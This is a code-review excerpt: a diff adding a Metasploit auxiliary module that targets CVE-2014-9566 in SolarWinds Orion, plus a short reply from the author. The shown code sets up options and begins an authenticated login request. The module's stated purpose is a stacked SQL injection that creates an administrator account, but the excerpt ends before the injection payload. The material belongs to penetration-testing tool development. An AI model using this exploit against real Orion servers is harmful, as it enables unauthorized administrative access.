modules/auxiliary/gather/solarwinds_orion_sqli.rb

```diff
@@ -0,0 +1,96 @@
+##
+# This module requires Metasploit: http//:metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Solarwinds Orion AccountManagement.asmx GetAccounts Admin Creation',
+      'Description'    => %q{
+      This module exploits a stacked SQL injection in order to add an administrator user to the
+      SolarWinds Orion database.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Brandon Perry' #discovery/metasploit module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-9566']
+        ],
+      'DisclosureDate' => 'Feb 24 2015'
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(8787),
+        OptString.new('TARGETURI', [ true, "Base Orion directory path", '/']),
+        OptString.new('USERNAME', [true, 'The username to authenticate as', 'Guest']),
+        OptString.new('PASSWORD', [false, 'The password to authenticate with', ''])
+      ], self.class)
+
+  end
+
+  def login (username,password)
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx')
+    })
+
+    viewstate = $1 if res.body =~ /id="__VIEWSTATE" value="(.*)" \/>/
+
+    cookie = res.get_cookies
+
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, 'Orion', 'Login.aspx'),
+      'method' => 'POST',
+      'vars_post' => {
+        '__EVENTTARGET' => '',
+        '__EVENTARGUMENT' => '',
+        '__VIEWSTATE' => viewstate,
+        'ctl00$BodyContent$Username' => datastore['USERNAME'],
+        'ctl00$BodyContent$Password' => datastore['PASSWORD']
```

Comment:
Great catch, fixing now. Originally, the login code lived in run, and was moved out. Missed updating this part.